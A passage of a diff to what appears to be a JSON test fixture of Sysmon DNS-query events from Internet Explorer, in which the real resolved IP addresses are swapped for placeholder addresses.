Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7518,7 +7518,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067550800Z'/\u003e\u003cEventRecordID\u003e206\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca4.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067550800Z'/\u003e\u003cEventRecordID\u003e206\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca4.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "time_created": "2019-07-18T03:34:10.067Z", @@ -7527,7 +7527,7 @@ "ProcessId": "2736", "QueryName": "ocsp.comodoca4.com", "QueryStatus": "0", - "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:09.184" }, @@ -7576,7 +7576,7 @@ "ProcessId": "2736", "QueryName": "sync.crwdcntrl.net", "QueryStatus": "0", - "QueryResults": "type: 5 td.crwdcntrl.net;type: 5 nginx-bcp-stackB-428666447.us-east-1.elb.amazonaws.com;::ffff:52.4.111.14;::ffff:52.205.68.184;::ffff:52.0.28.154;::ffff:34.225.82.232;::ffff:18.213.13.245;::ffff:52.22.171.66;::ffff:52.207.199.229;::ffff:52.72.57.144;192.5.6.30;", + "QueryResults": "type: 5 td.crwdcntrl.net;type: 5 nginx-bcp-stackB-428666447.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:09.322" }, @@ -7594,7 +7594,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067594200Z'/\u003e\u003cEventRecordID\u003e207\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.crwdcntrl.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.crwdcntrl.net;type: 5 nginx-bcp-stackB-428666447.us-east-1.elb.amazonaws.com;::ffff:52.4.111.14;::ffff:52.205.68.184;::ffff:52.0.28.154;::ffff:34.225.82.232;::ffff:18.213.13.245;::ffff:52.22.171.66;::ffff:52.207.199.229;::ffff:52.72.57.144;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067594200Z'/\u003e\u003cEventRecordID\u003e207\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.crwdcntrl.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.crwdcntrl.net;type: 5 nginx-bcp-stackB-428666447.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7606,7 +7606,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067634800Z'/\u003e\u003cEventRecordID\u003e208\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.730\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sync.ad.cpe.dotomi.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cpe.us.dotomi.weighted.com.akadns.net;type: 5 cpe.us.iad.dotomi.weighted.com.akadns.net;type: 5 iad04-convex.dotomi.com;::ffff:159.127.42.114;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067634800Z'/\u003e\u003cEventRecordID\u003e208\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.730\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sync.ad.cpe.dotomi.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cpe.us.dotomi.weighted.com.akadns.net;type: 5 cpe.us.iad.dotomi.weighted.com.akadns.net;type: 5 iad04-convex.dotomi.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7617,7 +7617,7 @@ "event_data": { "QueryName": "match.sync.ad.cpe.dotomi.com", "QueryStatus": "0", - "QueryResults": "type: 5 cpe.us.dotomi.weighted.com.akadns.net;type: 5 cpe.us.iad.dotomi.weighted.com.akadns.net;type: 5 iad04-convex.dotomi.com;::ffff:159.127.42.114;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;", + "QueryResults": "type: 5 cpe.us.dotomi.weighted.com.akadns.net;type: 5 cpe.us.iad.dotomi.weighted.com.akadns.net;type: 5 iad04-convex.dotomi.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:09.730", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -7648,7 +7648,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066534000Z'/\u003e\u003cEventRecordID\u003e209\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.627\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10230.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066534000Z'/\u003e\u003cEventRecordID\u003e209\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.627\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10230.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7680,7 +7680,7 @@ "ProcessId": "2736", "QueryName": "tps10230.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;" + "QueryResults": "type: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;" } }, "agent": { @@ -7697,7 +7697,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066558700Z'/\u003e\u003cEventRecordID\u003e210\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.650\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10221.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066558700Z'/\u003e\u003cEventRecordID\u003e210\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.650\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10221.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7725,7 +7725,7 @@ "ProcessId": "2736", "QueryName": "tps10221.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;", + "QueryResults": "type: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:10.650" }, @@ -7753,7 +7753,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 star-mini.c10r.facebook.com;::ffff:31.13.71.36;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 star-mini.c10r.facebook.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:16.329", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -7777,7 +7777,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272022200Z'/\u003e\u003cEventRecordID\u003e212\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.329\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.facebook.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 star-mini.c10r.facebook.com;::ffff:31.13.71.36;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272022200Z'/\u003e\u003cEventRecordID\u003e212\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.329\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.facebook.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 star-mini.c10r.facebook.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } @@ -7785,7 +7785,7 @@ { "@timestamp": "2021-05-05T15:30:51.712Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272102900Z'/\u003e\u003cEventRecordID\u003e213\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.386\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eplatform.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs472.wac.edgecastcdn.net;type: 5 cs1-apr-8315.wac.edgecastcdn.net;type: 5 wac.apr-8315.edgecastdns.net;type: 5 